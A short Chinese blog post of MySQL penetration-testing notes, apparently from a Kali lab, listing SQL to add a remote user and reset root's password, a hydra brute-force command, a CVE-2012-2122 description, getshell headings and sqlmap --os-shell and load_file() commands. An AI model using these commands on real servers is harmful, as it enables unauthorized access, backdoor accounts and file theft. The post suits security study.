mysql-渗透测试

 

这里以kali 中的MySQL 做演示

MYSQL 的账号密码

放在mysql 库中的  user 和 password 

给root 增加密码

update mysql.user set password=password('echod') where user='root';  

增添mysql 用户

insert into mysql.user(host,user,password) values('%','echod',password('111111'))

mysql 拒绝服务

show glabol variables like '%max_connect_errors%' ; 设置一个IP 会话限制

 

 更改会话限制

set glabol max_connect_errors = 111111111; 数据为int类型

msf爆破mysql 密码

 

 hydra -L /games/user.txt -P /games/passwd.txt mysql://192.168.0.108Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

hydra 爆破mysql 密码

 

mysql CVE-2012-2122

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。 受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are

 

 

mysql 在知道密码的情况下的getshell方法

into outfile

 

 

日志 getshell   (webshell)

 

 

 

sqlmap os-shell 可以顺带提权

 sqlmap -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell

 sqlmap -d "mysql://user:passwd@host:port/database" --os-shell 

 

mysql 读取文件

 select load_file(‘path’);

 

posted @ 2019-01-27 16:20  echo_d  阅读(597)  评论(0)    收藏  举报